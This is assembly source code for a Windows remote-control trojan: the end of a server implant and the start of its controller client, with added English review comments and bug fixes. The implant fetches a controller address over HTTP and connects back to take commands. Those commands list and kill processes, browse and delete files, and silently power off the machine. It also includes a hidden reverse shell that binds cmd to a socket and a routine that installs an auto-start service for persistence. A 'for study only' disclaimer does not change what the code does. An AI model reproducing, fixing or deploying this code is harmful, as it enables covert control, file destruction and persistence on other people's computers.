; into buff4. Returns DeleteFile's result in eax; nothing is reported back.
_DelFile proc _filename:DWORD
    mov eax,_filename
    invoke DeleteFile,eax
    ret
_DelFile endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
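; Thread entry ([getfilepaht] command): list one directory level and send
; each entry's full path to the controller, one send() per entry with a 1 s
; pause (the wire format has no framing; the sender apparently relies on the
; delay to keep entries in separate reads -- TCP does not guarantee that).
;   _lpszPath - directory to list (buff3, straight off the wire)
; Fix: the path was lstrcpy'd unbounded into a MAX_PATH stack buffer;
; it is now truncated so that the separator appended below still fits, and
; the search buffer has room for the "*.*" pattern.
_GetFilePath proc _lpszPath
    local @stFindFile:WIN32_FIND_DATA
    local @hFindFile
    local @szPath[MAX_PATH]:byte            ; "path/"
    local @szSearch[MAX_PATH+4]:byte        ; "path/*.*"
    local @szFindFile[1025]:byte            ; "path/<entry>"
    pushad
    invoke RtlZeroMemory,addr @szPath,sizeof @szPath
    invoke RtlZeroMemory,addr @szSearch,sizeof @szSearch
    invoke lstrcpyn,addr @szPath,_lpszPath,sizeof @szPath - 1
    ; Append "/" unless the path already ends with one (empty path: leave it).
    invoke lstrlen,addr @szPath
    lea ecx,@szPath
    add ecx,eax
    xor eax,eax
    mov al,'/'
    .if (ecx != offset 0) && (byte ptr [ecx-1] != al)
        mov word ptr [ecx],ax               ; "/" + NUL
    .endif
    invoke lstrcpy,addr @szSearch,addr @szPath
    invoke lstrcat,addr @szSearch,CTXT("*.*")
    invoke FindFirstFile,addr @szSearch,addr @stFindFile
    .if eax != INVALID_HANDLE_VALUE
        mov @hFindFile,eax
        .repeat
            invoke lstrcpy,addr @szFindFile,addr @szPath
            invoke lstrcat,addr @szFindFile,addr @stFindFile.cFileName
            .if @stFindFile.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY
                ; Only the first character is tested: this skips "." and ".."
                ; but also any directory whose name starts with '.'.
                .if @stFindFile.cFileName != '.'
                    inc dwFolderCount
                    invoke lstrlen,addr @szFindFile
                    invoke send,server,addr @szFindFile,eax,0
                    invoke Sleep,1000
                .endif
            .else
                invoke lstrlen,addr @szFindFile
                invoke send,server,addr @szFindFile,eax,0
                invoke Sleep,1000
            .endif
            invoke FindNextFile,@hFindFile,addr @stFindFile
        .until eax == FALSE
        invoke FindClose,@hFindFile
    .endif
    popad
    ret
_GetFilePath endp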
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
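; Thread entry ([getfile] command): send every fixed or removable drive
; root ("C:/" .. "Z:/") to the controller, one send() per drive with a 1 s
; pause (no framing on the wire).
;   _socket - connection to the controller
; Fix: szDisk is a stack local and was never cleared before the first
; lstrcat, so the first drive string was appended to stack garbage.
_GetFileDsik proc _socket
    local szDisk[10]:byte
    invoke Sleep,10
    invoke RtlZeroMemory,addr szDisk,sizeof szDisk
    invoke lstrcpy,addr szVol,CTXT("C")       ; szVol is a global 2-byte string used as the loop variable
    .while szVol <= 'Z'
        invoke lstrcat,addr szDisk,addr szVol
        invoke lstrcat,addr szDisk,CTXT(":/")
        invoke GetDriveType,addr szDisk
        .if (eax == DRIVE_FIXED) || (eax == DRIVE_REMOVABLE)
            invoke lstrlen,addr szDisk
            invoke send,_socket,addr szDisk,eax,0
            invoke Sleep,1000
        .endif
        invoke RtlZeroMemory,addr szDisk,sizeof szDisk
        inc szVol
    .endw
    ret
_GetFileDsik endp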
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
_ExitWindows proc
local ShutDown:DWORD               ; receives the privilege's previous state from RtlAdjustPrivilege
; Thread entry ([exitwindows] command): power the machine off through the
; native API with no warning to the logged-on user.
; First try to enable SeShutdownPrivilege on the THREAD token
; (CurrentThread=TRUE); only when that returns 0C000007Ch (STATUS_NO_TOKEN,
; i.e. the thread is not impersonating -- the normal case) is the PROCESS
; token adjusted and the shutdown issued. Any other status, including
; success on the thread token, results in no shutdown at all.
; Neither the second RtlAdjustPrivilege nor ZwShutdownSystem is checked.
invoke RtlAdjustPrivilege,SE_SHUTDOWN_PRIVILEGE,TRUE,TRUE,addr ShutDown
.if eax==00C000007Ch
invoke RtlAdjustPrivilege,SE_SHUTDOWN_PRIVILEGE,TRUE,FALSE,addr ShutDown
invoke ZwShutdownSystem,2          ; 2 = ShutdownPowerOff (SHUTDOWN_ACTION)
.endif
ret
_ExitWindows endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
_KillProcess proc processname:DWORD
local stProcess:PROCESSENTRY32
; Thread entry ([killprocess] command).
;   processname -> NUL-terminated image name (buff2, copied off the wire by _Main)
; Walks a Toolhelp snapshot, remembers the PID of every case-insensitive
; match (so the LAST match wins), then terminates that single process.
invoke RtlZeroMemory,addr stProcess,sizeof stProcess;clear the entry
mov stProcess.dwSize,sizeof stProcess
invoke CreateToolhelp32Snapshot,TH32CS_SNAPPROCESS,addr stProcess ; 2nd arg is th32ProcessID (ignored for this flag); a stack pointer is passed here
mov hSnapShot,eax                  ; global, shared with _GetProcessList; NOTE(review): never closed -- one handle leaked per command
invoke Process32First,hSnapShot,addr stProcess
.while eax
invoke CompareString,LOCALE_USER_DEFAULT,NORM_IGNORECASE,processname,-1,addr stProcess.szExeFile,-1
.if eax==2                         ; CSTR_EQUAL
push stProcess.th32ProcessID
pop closepid                       ; NOTE(review): global and never reset -- with no match, the previously killed PID (or 0) is reused below
.endif
invoke Process32Next,hSnapShot,addr stProcess
.endw
invoke OpenProcess,PROCESS_TERMINATE,FALSE,closepid
.if eax
mov ebx,eax                        ; ebx clobbered without 'uses'; tolerable only because this runs as a thread entry
invoke TerminateProcess,ebx,-1     ; the process handle is never closed
.endif
ret
_KillProcess endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
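; Thread entry ([getprocess] command): send the image name of every process
; in a Toolhelp snapshot to the controller, one send() per name with a 1 s
; pause (no framing on the wire).
;   _socket - connection to the controller
; Fixes: the snapshot handle is closed (it was leaked per command), snapshot
; creation failure is checked, and th32ProcessID is passed as 0 rather than
; as a stack pointer. hSnapShot is still a global shared with _KillProcess.
_GetProcessList proc _socket
    local stProcess:PROCESSENTRY32
    invoke RtlZeroMemory,addr stProcess,sizeof stProcess
    mov stProcess.dwSize,sizeof stProcess
    invoke CreateToolhelp32Snapshot,TH32CS_SNAPPROCESS,0
    .if eax == INVALID_HANDLE_VALUE
        ret
    .endif
    mov hSnapShot,eax
    invoke Process32First,hSnapShot,addr stProcess
    .while eax
        invoke lstrlen,addr stProcess.szExeFile
        invoke send,_socket,addr stProcess.szExeFile,eax,0
        invoke Sleep,1000
        invoke Process32Next,hSnapShot,addr stProcess
    .endw
    invoke CloseHandle,hSnapShot
    ret
_GetProcessList endp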
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
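; Enable (bFlags != 0) or disable the named privilege on this process token.
;   szPriv - pointer to the privilege name (e.g. "SeDebugPrivilege")
;   bFlags - non-zero to enable, zero to disable
; Returns AdjustTokenPrivileges' result in eax (per the API contract this is
; non-zero even when the privilege is not held -- check GetLastError for
; ERROR_NOT_ALL_ASSIGNED), or FALSE when the token cannot be opened or the
; name is unknown. Not referenced anywhere in this file.
_EnablePrivilege proc szPriv:DWORD, bFlags:DWORD
    LOCAL hToken
    LOCAL tkp : TOKEN_PRIVILEGES
    invoke GetCurrentProcess
    mov edx, eax                   ; keep the pseudo-handle out of eax: invoke uses eax for ADDR of locals
    invoke OpenProcessToken, edx, TOKEN_ADJUST_PRIVILEGES or TOKEN_QUERY, addr hToken
    .if eax == 0
        ret                        ; eax = FALSE; hToken is undefined
    .endif
    invoke LookupPrivilegeValue, NULL, szPriv, addr tkp.Privileges.Luid
    .if eax == 0
        invoke CloseHandle, hToken
        xor eax, eax
        ret
    .endif
    mov tkp.PrivilegeCount, 1
    xor eax, eax
    .if bFlags
        mov eax, SE_PRIVILEGE_ENABLED
    .endif
    mov tkp.Privileges.Attributes, eax
    invoke AdjustTokenPrivileges, hToken, FALSE, addr tkp, 0, 0, 0
    push eax                       ; preserve the result across CloseHandle
    invoke CloseHandle, hToken
    pop eax
    ret
_EnablePrivilege endp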
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
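; Fetch the controller address text from szUrl into szIP.
; The transfer is plain HTTP with no integrity check: whoever controls that
; host or path can redirect every instance (a takeover / sinkhole point).
; Trailing CR/LF in the body is not stripped -- TODO confirm inet_addr
; tolerates it.
; Fixes: failures of InternetOpen/InternetOpenUrl no longer leave
; uninitialised handles in use; szIP is NUL-terminated at the byte count
; actually read (an empty read yields "" rather than the previous text, so a
; stale address is not silently reused).
_ReadInternet proc
    local @hSession,@hHttpFile,@dwRead
    pushad
    mov @dwRead,0
    invoke InternetOpen,CTXT("ReadFile"),INTERNET_OPEN_TYPE_PRECONFIG,NULL,NULL,0
    .if eax != 0
        mov @hSession,eax
        invoke InternetOpenUrl,@hSession,addr szUrl,NULL,0,INTERNET_FLAG_NO_AUTO_REDIRECT,0
        .if eax != 0
            mov @hHttpFile,eax
            invoke InternetReadFile,@hHttpFile,addr szIP,sizeof szIP - 1,addr @dwRead
            invoke InternetCloseHandle,@hHttpFile
        .endif
        invoke InternetCloseHandle,@hSession
    .endif
    mov eax,@dwRead
    mov byte ptr szIP[eax],0
    popad
    ret
_ReadInternet endp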
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
_Cmd proc
local @wsaData:WSADATA
local @stAddr:sockaddr_in
local stStartUp:STARTUPINFO
local stProcInfo:PROCESS_INFORMATION
local hSocket
; Reverse shell: connect to szIP:8888 and run "cmd" with its stdin/stdout/
; stderr bound to the socket. Not called from anywhere in this file.
invoke WSAStartup,202h,addr @wsaData ; WinSock 2.2
invoke WSASocket,PF_INET,SOCK_STREAM,IPPROTO_TCP,NULL,0,0 ; flags 0 (not overlapped) so the handle can serve as a std handle
mov hSocket,eax
mov @stAddr.sin_family,AF_INET
invoke htons,8888 ; hard-coded port
mov @stAddr.sin_port,ax
invoke inet_addr,addr szIP;same address text _ReadInternet fetched
mov @stAddr.sin_addr,eax
invoke connect,hSocket,addr @stAddr,sizeof @stAddr;result not checked: cmd is started even if the connect failed
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
invoke GetStartupInfo,addr stStartUp
mov ebx,hSocket ; ebx clobbered without 'uses'
mov stStartUp.hStdInput,ebx ; all three std handles point at the socket
mov stStartUp.hStdOutput,ebx
mov stStartUp.hStdError,ebx
mov stStartUp.dwFlags,101h ; STARTF_USESTDHANDLES or STARTF_USESHOWWINDOW
mov stStartUp.wShowWindow,SW_HIDE
invoke CreateProcess,NULL,CTXT("cmd"),NULL,NULL,1,0,NULL,NULL,addr stStartUp,addr stProcInfo ; bInheritHandles=1 so the socket is inherited
invoke WaitForSingleObject,addr stProcInfo.hProcess,INFINITE ; NOTE(review): passes the ADDRESS of hProcess, not the handle -- almost certainly returns at once with WAIT_FAILED
invoke closesocket,hSocket ; the process/thread handles in stProcInfo are never closed
ret
_Cmd endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
_CreateSerice proc
LOCAL hSCManager
LOCAL hService
LOCAL szBuff[MAX_PATH] :byte
LOCAL ServiceStatus:SERVICE_STATUS ; unused
; Persistence: (re)register this executable as the auto-start, interactive
; service "GetSysService" and start it. Only reachable through the
; commented-out call in _Main, so inactive in this build. No
; StartServiceCtrlDispatcher call is visible in this file, so a process
; started this way would not report RUNNING to the SCM -- TODO confirm
; against the intended service entry.
invoke OpenSCManager, NULL, NULL, SC_MAN­AGER_Create_SERVICE ;local SCM with create rights
.if eax!=0
mov hSCManager, eax ;connected
invoke OpenService, hSCManager,CTXT("GetSysService"), Delete ;open an existing registration with DELETE access
.if eax!=0 ;exists: remove it first
push eax ;second copy of the handle for CloseServiceHandle below
invoke DeleteService, eax
call CloseServiceHandle ;consumes the pushed handle (stdcall)
.endif
invoke GetModuleFileName,NULL,addr szBuff,200 ;own path (limit 200, not sizeof szBuff)
invoke CreateService, hSCManager,CTXT("GetSysService"),CTXT("GetSysForShellexecute"),/ ;create the service: SERVICE_WIN32_OWN_PROCESS|INTERACTIVE, auto-start, errors ignored
SERVICE_START + SERVICE_QUERY_STATUS + Delete, /
SERVICE_WIN32_OWN_PROCESS + SERVICE_INTERACTIVE_PROCESS,SERVICE_AUTO_START, /
SERVICE_ERROR_IGNORE, addr szBuff,NULL, NULL, NULL, NULL, NULL
.if eax!=0
mov hService, eax
invoke StartService, hService, 0, NULL;start it now
invoke CloseServiceHandle, hService
.endif
invoke CloseServiceHandle, hSCManager
.endif
ret
_CreateSerice endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;应该当作一个指针。
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
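; Build and send the check-in record: hostname, first IPv4 address, UTC
; time, and the operator remark stored under HKLM\<szRegKey>\<szKey>,
; followed by the "[info]" tag that client.asm keys on.
;   _socket - connection to the controller (declared LPSTR, used as SOCKET)
; The struct is appended as a C string starting at sysinfo.dwip; dwip is
; never written and lives in .data?, so its first byte is 0 and, as far as
; the visible code shows, only "[info]" is actually transmitted. The wire
; format is kept as is.
; Fixes: BufSize was never initialised before RegQueryValueEx (stack garbage
; as the buffer size -> possible overrun of szKeyName); szKeyName is cleared
; so a non-terminated REG_SZ stays bounded; szSysinfoData is cleared so
; reconnects do not accumulate "[info][info]..."; gethostbyname NULL is
; handled; the bare .elseif is a plain .else.
SendSysInfo proc _socket:LPSTR
    local szTime:SYSTEMTIME
    local szTimeBuff[1024]:DWORD
    local @hKey:DWORD
    local BufSize:DWORD
    pushad
    invoke RtlZeroMemory,addr szSysinfoData,sizeof szSysinfoData
    invoke gethostname,addr szHostName,sizeof szHostName
    invoke gethostbyname,addr szHostName
    .if eax != NULL
        mov eax,[eax+12]              ; hostent.h_addr_list
        mov eax,[eax]                 ; first address entry
        mov eax,[eax]                 ; the IPv4 address itself
        invoke inet_ntoa,eax
        invoke wsprintf,addr szHost,CTXT("%s"),eax
    .else
        mov szHost,0                  ; unresolved: empty IP string
    .endif
    invoke lstrcpy,addr sysinfo.szHostIP,addr szHost
    invoke lstrcpy,addr sysinfo.szHostName,addr szHostName
    invoke GetSystemTime,addr szTime
    movzx ebx,szTime.wMonth
    movzx eax,szTime.wDay
    movzx ecx,szTime.wHour
    movzx edx,szTime.wMinute
    invoke wsprintf,addr szTimeBuff,CTXT("%d月%d日%d时%d秒"),ebx,eax,ecx,edx
    invoke lstrcpy,addr sysinfo.szHostTime,addr szTimeBuff
    ; Operator remark, if any.
    invoke RtlZeroMemory,addr sysinfo.szWhat,sizeof sysinfo.szWhat
    invoke RegOpenKeyEx, HKEY_LOCAL_MACHINE,addr szRegKey,NULL, KEY_QUERY_VALUE,addr @hKey
    .if eax == ERROR_SUCCESS
        invoke RtlZeroMemory,addr szKeyName,sizeof szKeyName
        mov BufSize,sizeof szKeyName - 1
        invoke RegQueryValueEx,@hKey,addr szKey,NULL,NULL,addr szKeyName,addr BufSize
        .if eax == ERROR_SUCCESS
            invoke lstrcpy,addr sysinfo.szWhat,addr szKeyName
        .endif
        invoke RegCloseKey,@hKey
    .endif
    invoke lstrcat,addr szSysinfoData,addr sysinfo
    invoke lstrcat,addr szSysinfoData,CTXT("[info]")
    invoke lstrlen,addr szSysinfoData
    invoke send,_socket,addr szSysinfoData,eax,0
    popad
    ret
SendSysInfo endp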
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
_Main proc
local @temp:SOCKET ; unused
local @stAddr:sockaddr_in
local @dwRecv ; recv() result, stored but never tested (see the note in the loop)
; Worker thread (started from `start`): fetch the controller address, connect,
; announce this host, then dispatch commands until the connection breaks and
; reconnect after a 1 s pause. Nothing on the wire is authenticated: whoever
; answers on szIP:9999 controls this host.
; call _CreateSerice ;install as an auto-start service (belongs at program start) -- commented out in this build
connectstart:
invoke WSAStartup,202H,addr @stData ; WinSock 2.2; paired with WSACleanup at _Ret on every cycle
invoke RtlZeroMemory,addr @stAddr,sizeof sockaddr_in
mov @stAddr.sin_family,AF_INET
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;The port used here must match the port the controller listens on (9999 in client.asm _Init)
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
invoke htons,9999
mov @stAddr.sin_port,ax
call _ReadInternet ; fill szIP from szUrl (plain HTTP)
invoke inet_addr,addr szIP ; no validation; an empty or garbled szIP gives INADDR_NONE and connect() fails
mov @stAddr.sin_addr,eax
invoke socket,AF_INET,SOCK_STREAM,0
mov server,eax ; global; the command handlers send on it from their own threads
invoke connect,server,addr @stAddr,sizeof @stAddr
.if eax == SOCKET_ERROR
jmp _Ret ; close, sleep 1 s, retry from connectstart
.endif
invoke SendSysInfo,server ;check-in record (the "[info]" message)
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; Command loop. Commands are recognised by substring (StrStr), so one recv()
; carrying several tags fires several handlers. Every argument copy below
; takes (strlen - taglen) bytes from the START of lpBuffer, i.e. it assumes
; the tag is the last thing in the buffer (which is how client.asm builds
; them); if the tag sits elsewhere the copy includes part of it.
; Each handler runs on a fresh thread whose handle is never closed.
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
.while TRUE
invoke RtlZeroMemory,addr lpBuffer,sizeof lpBuffer
invoke recv,server,addr lpBuffer,1024,0 ; at most 1024 of lpBuffer's 10024 bytes, so the text stays NUL-terminated
mov @dwRecv,eax
; NOTE(review): @dwRecv is ignored. After the peer closes (0) or an error
; (SOCKET_ERROR) this loop spins on a zeroed buffer forever and never reaches
; _Ret, so the reconnect path is only taken when the initial connect() fails.
invoke StrStr,addr lpBuffer,CTXT("[getprocess]")
.if eax!=NULL
invoke CreateThread,NULL,0,addr _GetProcessList,server,0,addr ThreadId
.endif
invoke StrStr,addr lpBuffer,CTXT("[killprocess]")
.if eax!=NULL
pushad
invoke lstrlen,addr lpBuffer
sub eax,13 ; strip the 13-byte "[killprocess]" tag -> buff2 = image name
lea esi,lpBuffer
lea edi,buff2
add esi,0
mov ecx,eax
rep movsb
mov byte ptr [edi],0
popad
invoke CreateThread,NULL,0,addr _KillProcess,addr buff2,0,addr ThreadId1 ; buff2 is a global reused by the next such command
.endif
invoke StrStr,addr lpBuffer,CTXT("[exitwindows]")
.if eax!=NULL
invoke CreateThread,NULL,0,addr _ExitWindows,0,0,addr ThreadId2
.endif
invoke StrStr,addr lpBuffer,CTXT("[getfile]")
.if eax!=NULL
invoke CreateThread,NULL,0,addr _GetFileDsik,server,0,addr ThreadId3 ; drive list
.endif
invoke StrStr,addr lpBuffer,CTXT("[getfilepaht]")
.if eax!=NULL
pushad
invoke lstrlen,addr lpBuffer
sub eax,13 ; strip "[getfilepaht]" -> buff3 = directory to list
lea esi,lpBuffer
lea edi,buff3
add esi,0
mov ecx,eax
rep movsb
mov byte ptr [edi],0
popad
invoke CreateThread,NULL,0,addr _GetFilePath,addr buff3,0,addr ThreadId4
.endif
invoke StrStr,addr lpBuffer,CTXT("[delfile]")
.if eax!=NULL
pushad
invoke lstrlen,addr lpBuffer
sub eax,9 ; strip "[delfile]" -> buff4 = path to delete
lea esi,lpBuffer
lea edi,buff4
add esi,0
mov ecx,eax
rep movsb
mov byte ptr [edi],0
popad
invoke CreateThread,NULL,0,addr _DelFile,addr buff4,0,addr ThreadId5
.endif
invoke StrStr,addr lpBuffer,CTXT("Upfile") ; file upload: argument copied to buff5, but no handler is started
.if eax!=NULL
pushad
invoke lstrlen,addr lpBuffer
sub eax,6
lea esi,lpBuffer
lea edi,buff5
add esi,0
mov ecx,eax
rep movsb
mov byte ptr [edi],0
popad
; invoke MessageBox,0,addr buff5,0,0
; invoke CreateThread,NULL,0,addr _UpFile,server,0,addr ThreadId7 ; _UpFile is not defined in this file
.endif
.endw
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
_Ret:
.if server
invoke closesocket,server
xor eax,eax
mov server,eax
.endif
invoke WSACleanup
invoke Sleep,1000
jmp connectstart ; this thread never returns
ret
_Main endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
start proc
; Entry point. Single-instance guard: ERROR_ALREADY_EXISTS (0B7h) after
; CreateMutex means another copy already holds "GetSys1_Mutex".
invoke CreateMutex, NULL, TRUE,CTXT("GetSys1_Mutex")
mov ebx,eax ; mutex handle; never released or closed
invoke GetLastError
.if eax!=0B7h
push ecx ; the pushed dword doubles as lpThreadId storage for the call below
invoke CreateThread,NULL,0,offset _Main,0,NULL,esp
pop ecx
invoke CloseHandle,eax ; drop the thread handle; _Main keeps running
.elseif
mov eax,FALSE ; bare .elseif (presumably meant .else); a second instance does NOT exit, it falls into the loop below
.endif
;********************************************************************
; Message loop. No window is created in this file, so GetMessage blocks
; until a thread message arrives; this merely keeps the process (and
; _Main's thread) alive.
;********************************************************************
.while TRUE
invoke GetMessage,addr stMsg,NULL,0,0
invoke DispatchMessage,addr stMsg
.endw
ret
start endp
end start
注意：代码仅供学习之用；若有人将此代码修改成恶意程序，与作者无关。
client.asm
;******************************************************
;程序编写by Asm
;日期:2007-6-13日
;出处: http://www.wolfexp.net/(红狼安全小组)
;注意事项:如欲转载,请保持本程序的完整,并注明:
;转载自 红狼安全小组( http://www.wolfexp.net/)
;******************************************************
.386
.model flat, stdcall
option casemap :none
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; Include 文件定义
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
include windows.inc
include user32.inc
includelib user32.lib
include kernel32.inc
includelib kernel32.lib
include wsock32.inc
includelib wsock32.lib
include Shlwapi.inc
includelib Shlwapi.lib
include comdlg32.inc
includelib comdlg32.lib
include ole32.inc
includelib ole32.lib
include shell32.inc
includelib shell32.lib
include odbc32.inc
includelib odbc32.lib
include macros.inc
include data.INC
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;客户端会话
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
SESSION struct                     ; per-connection record; declared here but not referenced anywhere in this file
dwip dd ?                          ; host address as a 32-bit value
hsocket db 12 dup (?)              ; socket handle as text (the list box shows "%x" of the handle)
szHostIP db 156 dup(?)             ; host IP string
szHostName db 156 dup(?)           ; host name
szHostTime db 156 dup(?)           ; check-in time string
szWhat db 156 dup(?)               ; operator remark
SESSION ends
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;自定义协议结构,显示肉鸡上线信息
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; Check-in record. Mirrors the MSG_SYSINFO layout in server.asm, which
; sends it as a string followed by the "[info]" tag; this file only
; copies the incoming text to buff2 and never reads the fields.
MSG_SYSINFO struct
dwip dd ?                          ; host address (never written by the visible server code)
szHostIP db 156 dup(?)             ; host IP string
szHostName db 156 dup(?)           ; host name
szHostTime db 156 dup(?)           ; check-in time string
szWhat db 156 dup(?)               ; remark read from the registry on the host
MSG_SYSINFO ends
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
.code
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;显示下线日志
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
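; Insert one row of text into hlistview as item `row`, with lParam = row.
;   row    - item index
;   lpTime - pointer to the NUL-terminated text for the item
; hlistview is obtained from IDC_Log in _ProcDlgMain; that control also
; receives LB_ADDSTRING, so only one of the two message families can be
; meaningful for it -- check the dialog template.
ShowProcess proc row:DWORD,lpTime:DWORD
    LOCAL lvi:LV_ITEM
    ; Start from an all-zero item so the fields not covered by imask
    ; (state, stateMask, iImage, ...) are defined rather than stack garbage.
    invoke RtlZeroMemory,addr lvi,sizeof lvi
    mov lvi.imask,LVIF_TEXT+LVIF_PARAM
    mov eax,row
    mov lvi.iItem,eax
    mov lvi.iSubItem,0
    mov eax,lpTime                    ; lpTime is already a pointer, so mov (not lea)
    mov lvi.pszText,eax
    mov eax,row
    mov lvi.lParam,eax                ; row number travels with the item
    invoke SendMessage,hlistview, LVM_InsertITEM,0, addr lvi
    ret
ShowProcess endp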
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; 字符串到16或10进制
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
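; Parse a NUL-terminated numeric string in base _dwBase (10 or 16).
;   _lpString - pointer to the digits ("0"-"9", "a"-"f"/"A"-"F")
;   _dwBase   - radix
; Returns the value in eax. No validation: any other character is folded
; into the result as if it were a digit.
; ebx/esi are callee-saved under stdcall, so they are preserved here
; (the original clobbered them and relied on the caller's pushad/popad).
_StrToVal proc uses ebx esi _lpString,_dwBase
    mov esi,_lpString
    cld
    xor eax,eax
    mov ebx,_dwBase
    .while TRUE
        movzx ecx,byte ptr [esi]
        inc esi
        .break .if ! ecx              ; terminator
        .if cl > '9'
            and cl,not 20h            ; fold to upper case
            sub cl,'A' - 0ah          ; 'A'..'F' -> 10..15
        .else
            sub cl,'0'
        .endif
        mul ebx                       ; eax = eax * base (edx clobbered)
        add eax,ecx
    .endw
    ret
_StrToVal endp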
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;此函数的用途是选择每一个连接上的肉鸡socket的编号
;并发送命令
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
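; Send a command string to the host currently selected in IDC_ServerList.
;   _CmdLine - pointer to the NUL-terminated command text
; The list entries are written by _AddClient as "%x" of the socket handle,
; so the text is parsed back as base 16 to recover the handle.
; With nothing selected the original passed LB_ERR to LB_GETTEXT, left
; @buff1 untouched and sent to whatever stale handle that parsed to; now
; the command is simply not sent. The send result is not checked.
GetSocketAndSend proc _CmdLine:DWORD
    pushad
    invoke SendDlgItemMessage,hWinMain,IDC_ServerList,LB_GETCURSEL,0,0
    .if eax != LB_ERR
        lea ecx,@buff1
        invoke SendDlgItemMessage,hWinMain,IDC_ServerList,LB_GETTEXT,eax,ecx
        invoke _StrToVal,addr @buff1,00000010h
        mov edi,eax                   ; edi = socket handle
        invoke lstrlen,_CmdLine
        ; No framing, no terminator, no authentication: the raw text goes out.
        invoke send,edi,_CmdLine,eax,0
    .endif
    popad
    ret
GetSocketAndSend endp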
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
_OpenFile proc _FileBuff:DWORD
; Shows the standard "Open" dialog and stores the chosen path in the
; MAX_PATH buffer at _FileBuff.  Returns GetOpenFileName's result in eax
; (non-zero when the user pressed OK).  szFilter is a global not visible
; here.  @stES is declared but never used.  lpstrDefExt is set to a
; non-ASCII literal, which is unusual for a default extension; with
